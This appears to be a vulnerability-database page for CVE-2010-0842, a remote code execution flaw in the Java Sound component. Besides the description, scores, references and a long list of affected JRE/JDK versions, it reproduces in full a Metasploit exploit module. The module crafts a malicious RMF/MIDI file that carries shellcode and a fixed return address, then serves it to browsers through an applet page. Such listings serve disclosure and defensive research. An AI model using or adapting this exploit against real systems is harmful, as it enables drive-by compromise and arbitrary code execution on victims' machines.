CVE-2010-0842 : Detail

CVE-2010-0842

95.04%V3
Network
2010-04-01
14h00 +00:00
2018-10-10
16h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Unspecified vulnerability in the Sound component in Oracle Java SE and Java for Business 6 Update 18, 5.0 Update 23, 1.4.2_25, and 1.3.1_27 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the March 2010 CPU. Oracle has not commented on claims from a reliable researcher that this is an uncontrolled array index that allows remote attackers to execute arbitrary code via a MIDI file with a crafted MixerSequencer object, related to the GM_Song structure.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE Other No informations.

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 18485

Publication date : 2012-02-15 23h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info={}) super(update_info(info, 'Name' => "Java MixerSequencer Object GM_Song Structure Handling Vulnerability", 'Description' => %q{ This module exploits a flaw within the handling of MixerSequencer objects in Java 6u18 and before. Exploitation id done by supplying a specially crafted MIDI file within an RMF File. When the MixerSequencer objects is used to play the file, the GM_Song structure is populated with a function pointer provided by a SONG block in the RMF. A Midi block that contains a MIDI with a specially crafted controller event is used to trigger the vulnerability. When triggering the vulnerability "ebx" points to a fake event in the MIDI file which stores the shellcode. A "jmp ebx" from msvcr71.dll is used to make the exploit reliable over java updates. }, 'License' => MSF_LICENSE, 'Author' => [ 'Peter Vreugdenhil', # Vulnerability Discovery and exploit 'juan vazquez', # Metasploit module ], 'References' => [ [ 'CVE', '2010-0842' ], [ 'OSVDB', '63493'], [ 'BID', '39077'], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-060/' ], [ 'URL', 'http://vreugdenhilresearch.nl/java-midi-parse-vulnerabilities/'] ], 'Payload' => { 'Space' => 8000, }, 'DefaultOptions' => { 'EXITFUNC' => "process", 'InitialAutoRunScript' => 'migrate -f', }, 'Platform' => 'win', 'Targets' => [ [ # Tested succesfully on: # Windows XP SP3 / IE 6 / Java 6u18 # Windows XP SP3 / IE 7 / Java 6u18 # Windows XP SP3 / IE 8 / Java 6u18 # Windows XP SP3 / Firefox 7.0.1 / Java 6u18 # Windows XP SP3 / IE 8 / Java 6u17 # Windows XP SP3 / Firefox 7.0.1 / Java 6u17 # Windows 7 / IE 8 / Java 6u18 'Windows / Java 6 <=u18', { 'Ret' => 0x7C35A78D # jmp ebx # msvcr71.dll } ], ], 'Privileged' => false, 'DisclosureDate' => "Mar 30 2010", 'DefaultTarget' => 0)) end def get_rmf rmf_header = "" rmf_header << "IREZ" # RMFHeaderMagic rmf_header << "\x00\x00\x00\x01" # RMFVersionNumber rmf_header << "\x00\x00\x00\x02" # NumberOfRMFBlocks song_block = "" song_block << "\x00\x00\x00\x65" # OffsetToNextBlock song_block << "SONG" # BlockType song_block << [target.ret].pack("N") # BlockID song_block << "\x00" # BlockName song_block << "\x00\x00\x00\x47" # BlockDataSize song_block << "\x7F\xFF\x00\x01\x00\x00\x01\x01" # BlockData song_block << "\x00\x00\x00\x04\x00\x1C\x00\x08" # BlockData song_block << "\x00\x7F\x00\x00\x00\x00\x00\x00" # BlockData song_block << "\x00\x00\x00\x00\x00\x00\x00\x00" # BlockData song_block << "\x00\x00\x00\x00\x00\x00\x00\x00" # BlockData song_block << "\x00\x00\x00\x00\x00\x00\x00\x00" # BlockData song_block << "\x00\x01\x54\x49\x54\x4C\x9F\xB1" # BlockData song_block << "\xB5\x0D\x0A\x7E\xFB\x70\x9C\x86" # BlockData song_block << "\xFE\xB0\x35\x93\xE2\x5E\xDE\xF7" # BlockData midi = "" # HEADERCHUNK Header midi << "MThd" # Header midi << "\x00\x00\x00\x06" # Chunk size midi << "\x00\x01" # Format Type midi << "\x00\x01" # Number of tracks midi << "\x00\x08" # Time division # TRACKCHUNK header midi << "MTrk" # Header midi << "\x00\x00\x24\xd7" # Length midi << "\x00\xb0\x80\x00" # Controller Event # Triggers the vulnerability # Fake Midi Meta event - Shellcode midi << "\x38" # Variable lenght delta time midi << "\xff" # Midi meta event midi << "\x02" # Meta event type 02 => Copyright notice midi << "\xc9\x50" # Variable Meta Event Length midi << payload.encoded midi << rand_text(9123 - payload.encoded.length) midi_block = "\x00\x00\x25\x60" # OffsetToNextBlock midi_block << "Midi" # BlockType midi_block << "\x00\x00\x7f\xff" # BlockID midi_block << "\x00" # BlockName midi_block << "\x00\x00\x24\xed" # BlockDataSize midi_block << midi # BlockData rmf = "" rmf << rmf_header rmf << song_block rmf << midi_block rmf_name = "#{rand_text_alpha(rand(5) + 3)}.rmf" return rmf_name, rmf end def get_jar files = [ [ "MyController.class" ], [ "MixerMidiApplet.class" ], [ "META-INF", "services", "javax.sound.midi.spi.MidiDeviceProvider" ] ] jar = Rex::Zip::Jar.new jar.add_file("META-INF/", "") jar.add_file("META-INF/services/", "") jar.add_files(files, File.join(Msf::Config.install_root, "data", "exploits", "CVE-2010-0842")) jar.build_manifest jar_name = "#{rand_text_alpha(rand(5) + 3)}.jar" return jar_name, jar end def on_request_uri(cli, request) if request.uri =~ /\.jar$/i print_status("Sending JAR file to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, @jar.pack, {'Content-Type'=>'application/octet-strem'}) return end if request.uri =~ /\.rmf$/i print_status("Sending RMF file to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, @rmf, {'Content-Type'=>'application/octet-strem'}) return end base_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource rmf_uri = base_uri + "/#{@rmf_name}" jar_uri = base_uri + "/#{@jar_name}" html = %Q| <html> <head> </head> <body> <applet code="MixerMidiApplet.class" archive="#{jar_uri}" width=350 height=200> <param name="midifile" valuetype="ref" value="#{rmf_uri}"> </applet> </body> </html> | html = html.gsub(/^\t\t/, '') print_status("Sending html to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, html, {'Content-Type'=>'text/html'}) end def exploit @jar_name, @jar = get_jar @rmf_name, @rmf = get_rmf super end end

Products Mentioned

Configuraton 0

Sun>>Jre >> Version To (including) 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Configuraton 0

Sun>>Jdk >> Version To (including) 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Configuraton 0

Sun>>Jdk >> Version To (including) 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Configuraton 0

Sun>>Sdk >> Version To (including) 1.4.2_25

Sun>>Sdk >> Version 1.4.2

Sun>>Sdk >> Version 1.4.2_1

Sun>>Sdk >> Version 1.4.2_02

Sun>>Sdk >> Version 1.4.2_3

Sun>>Sdk >> Version 1.4.2_4

Sun>>Sdk >> Version 1.4.2_5

Sun>>Sdk >> Version 1.4.2_6

Sun>>Sdk >> Version 1.4.2_7

Sun>>Sdk >> Version 1.4.2_8

Sun>>Sdk >> Version 1.4.2_9

Sun>>Sdk >> Version 1.4.2_10

Sun>>Sdk >> Version 1.4.2_11

Sun>>Sdk >> Version 1.4.2_12

Sun>>Sdk >> Version 1.4.2_13

Sun>>Sdk >> Version 1.4.2_14

Sun>>Sdk >> Version 1.4.2_15

Sun>>Sdk >> Version 1.4.2_16

Sun>>Sdk >> Version 1.4.2_17

Sun>>Sdk >> Version 1.4.2_18

Sun>>Sdk >> Version 1.4.2_19

Sun>>Sdk >> Version 1.4.2_20

Sun>>Sdk >> Version 1.4.2_21

Sun>>Sdk >> Version 1.4.2_22

Sun>>Sdk >> Version 1.4.2_23

Sun>>Sdk >> Version 1.4.2_24

Configuraton 0

Sun>>Jre >> Version To (including) 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Configuraton 0

Sun>>Jre >> Version To (including) 1.4.2_25

Sun>>Jre >> Version 1.4.2

Sun>>Jre >> Version 1.4.2_1

Sun>>Jre >> Version 1.4.2_2

Sun>>Jre >> Version 1.4.2_3

Sun>>Jre >> Version 1.4.2_4

Sun>>Jre >> Version 1.4.2_5

Sun>>Jre >> Version 1.4.2_6

Sun>>Jre >> Version 1.4.2_7

Sun>>Jre >> Version 1.4.2_8

Sun>>Jre >> Version 1.4.2_9

Sun>>Jre >> Version 1.4.2_10

Sun>>Jre >> Version 1.4.2_11

Sun>>Jre >> Version 1.4.2_12

Sun>>Jre >> Version 1.4.2_13

Sun>>Jre >> Version 1.4.2_14

Sun>>Jre >> Version 1.4.2_15

Sun>>Jre >> Version 1.4.2_16

Sun>>Jre >> Version 1.4.2_17

Sun>>Jre >> Version 1.4.2_18

Sun>>Jre >> Version 1.4.2_19

Sun>>Jre >> Version 1.4.2_20

Sun>>Jre >> Version 1.4.2_21

Sun>>Jre >> Version 1.4.2_22

Sun>>Jre >> Version 1.4.2_23

Sun>>Jre >> Version 1.4.2_24

Configuraton 0

Sun>>Jdk >> Version To (including) 1.3.1_27

Sun>>Jdk >> Version 1.3.0

Sun>>Jdk >> Version 1.3.0_01

Sun>>Jdk >> Version 1.3.0_02

Sun>>Jdk >> Version 1.3.0_03

Sun>>Jdk >> Version 1.3.0_04

Sun>>Jdk >> Version 1.3.0_05

Sun>>Jdk >> Version 1.3.1

Sun>>Jdk >> Version 1.3.1_01

Sun>>Jdk >> Version 1.3.1_01a

Sun>>Jdk >> Version 1.3.1_02

Sun>>Jdk >> Version 1.3.1_03

Sun>>Jdk >> Version 1.3.1_04

Sun>>Jdk >> Version 1.3.1_05

Sun>>Jdk >> Version 1.3.1_06

Sun>>Jdk >> Version 1.3.1_07

Sun>>Jdk >> Version 1.3.1_08

Sun>>Jdk >> Version 1.3.1_09

Sun>>Jdk >> Version 1.3.1_10

Sun>>Jdk >> Version 1.3.1_11

Sun>>Jdk >> Version 1.3.1_12

Sun>>Jdk >> Version 1.3.1_13

Sun>>Jdk >> Version 1.3.1_14

Sun>>Jdk >> Version 1.3.1_15

Sun>>Jdk >> Version 1.3.1_16

Sun>>Jdk >> Version 1.3.1_17

Sun>>Jdk >> Version 1.3.1_18

Sun>>Jdk >> Version 1.3.1_19

Sun>>Jdk >> Version 1.3.1_20

Sun>>Jdk >> Version 1.3.1_21

Sun>>Jdk >> Version 1.3.1_22

Sun>>Jdk >> Version 1.3.1_23

Sun>>Jdk >> Version 1.3.1_24

Sun>>Jdk >> Version 1.3.1_25

Sun>>Jdk >> Version 1.3.1_26

Configuraton 0

Sun>>Jre >> Version To (including) 1.3.1_27

Sun>>Jre >> Version 1.3.0

Sun>>Jre >> Version 1.3.0

Sun>>Jre >> Version 1.3.0

Sun>>Jre >> Version 1.3.0

Sun>>Jre >> Version 1.3.0

Sun>>Jre >> Version 1.3.0

Sun>>Jre >> Version 1.3.1

Sun>>Jre >> Version 1.3.1

Sun>>Jre >> Version 1.3.1

Sun>>Jre >> Version 1.3.1_2

Sun>>Jre >> Version 1.3.1_03

Sun>>Jre >> Version 1.3.1_04

Sun>>Jre >> Version 1.3.1_05

Sun>>Jre >> Version 1.3.1_06

Sun>>Jre >> Version 1.3.1_07

Sun>>Jre >> Version 1.3.1_08

Sun>>Jre >> Version 1.3.1_09

Sun>>Jre >> Version 1.3.1_10

Sun>>Jre >> Version 1.3.1_11

Sun>>Jre >> Version 1.3.1_12

Sun>>Jre >> Version 1.3.1_13

Sun>>Jre >> Version 1.3.1_14

Sun>>Jre >> Version 1.3.1_15

Sun>>Jre >> Version 1.3.1_16

Sun>>Jre >> Version 1.3.1_17

Sun>>Jre >> Version 1.3.1_18

Sun>>Jre >> Version 1.3.1_19

Sun>>Jre >> Version 1.3.1_20

Sun>>Jre >> Version 1.3.1_21

Sun>>Jre >> Version 1.3.1_22

Sun>>Jre >> Version 1.3.1_23

Sun>>Jre >> Version 1.3.1_24

Sun>>Jre >> Version 1.3.1_25

Sun>>Jre >> Version 1.3.1_26

Configuraton 0

Sun>>Sdk >> Version To (including) 1.3.1_27

Sun>>Sdk >> Version 1.3.0

Sun>>Sdk >> Version 1.3.0_01

Sun>>Sdk >> Version 1.3.0_02

Sun>>Sdk >> Version 1.3.0_03

Sun>>Sdk >> Version 1.3.0_04

Sun>>Sdk >> Version 1.3.0_05

Sun>>Sdk >> Version 1.3.1

Sun>>Sdk >> Version 1.3.1_01

Sun>>Sdk >> Version 1.3.1_01a

Sun>>Sdk >> Version 1.3.1_02

Sun>>Sdk >> Version 1.3.1_03

Sun>>Sdk >> Version 1.3.1_04

Sun>>Sdk >> Version 1.3.1_05

Sun>>Sdk >> Version 1.3.1_06

Sun>>Sdk >> Version 1.3.1_07

Sun>>Sdk >> Version 1.3.1_08

Sun>>Sdk >> Version 1.3.1_09

Sun>>Sdk >> Version 1.3.1_10

Sun>>Sdk >> Version 1.3.1_11

Sun>>Sdk >> Version 1.3.1_12

Sun>>Sdk >> Version 1.3.1_13

Sun>>Sdk >> Version 1.3.1_14

Sun>>Sdk >> Version 1.3.1_15

Sun>>Sdk >> Version 1.3.1_16

Sun>>Sdk >> Version 1.3.1_17

Sun>>Sdk >> Version 1.3.1_18

Sun>>Sdk >> Version 1.3.1_19

Sun>>Sdk >> Version 1.3.1_20

Sun>>Sdk >> Version 1.3.1_21

Sun>>Sdk >> Version 1.3.1_22

Sun>>Sdk >> Version 1.3.1_23

Sun>>Sdk >> Version 1.3.1_24

Sun>>Sdk >> Version 1.3.1_25

Sun>>Sdk >> Version 1.3.1_26

References

http://marc.info/?l=bugtraq&m=134254866602253&w=2
Tags : vendor-advisory, x_refsource_HP
http://secunia.com/advisories/39317
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.redhat.com/support/errata/RHSA-2010-0383.html
Tags : vendor-advisory, x_refsource_REDHAT
http://secunia.com/advisories/40545
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2010/1454
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/39819
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.redhat.com/support/errata/RHSA-2010-0338.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.vupen.com/english/advisories/2010/1793
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/43308
Tags : third-party-advisory, x_refsource_SECUNIA
http://marc.info/?l=bugtraq&m=127557596201693&w=2
Tags : vendor-advisory, x_refsource_HP
http://marc.info/?l=bugtraq&m=127557596201693&w=2
Tags : vendor-advisory, x_refsource_HP
http://www.securityfocus.com/bid/39077
Tags : vdb-entry, x_refsource_BID
http://support.apple.com/kb/HT4170
Tags : x_refsource_CONFIRM
http://www.vupen.com/english/advisories/2010/1523
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/39659
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.redhat.com/support/errata/RHSA-2010-0471.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.redhat.com/support/errata/RHSA-2010-0337.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.redhat.com/support/errata/RHSA-2010-0489.html
Tags : vendor-advisory, x_refsource_REDHAT
http://secunia.com/advisories/40211
Tags : third-party-advisory, x_refsource_SECUNIA
http://support.apple.com/kb/HT4171
Tags : x_refsource_CONFIRM
http://www.vupen.com/english/advisories/2010/1191
Tags : vdb-entry, x_refsource_VUPEN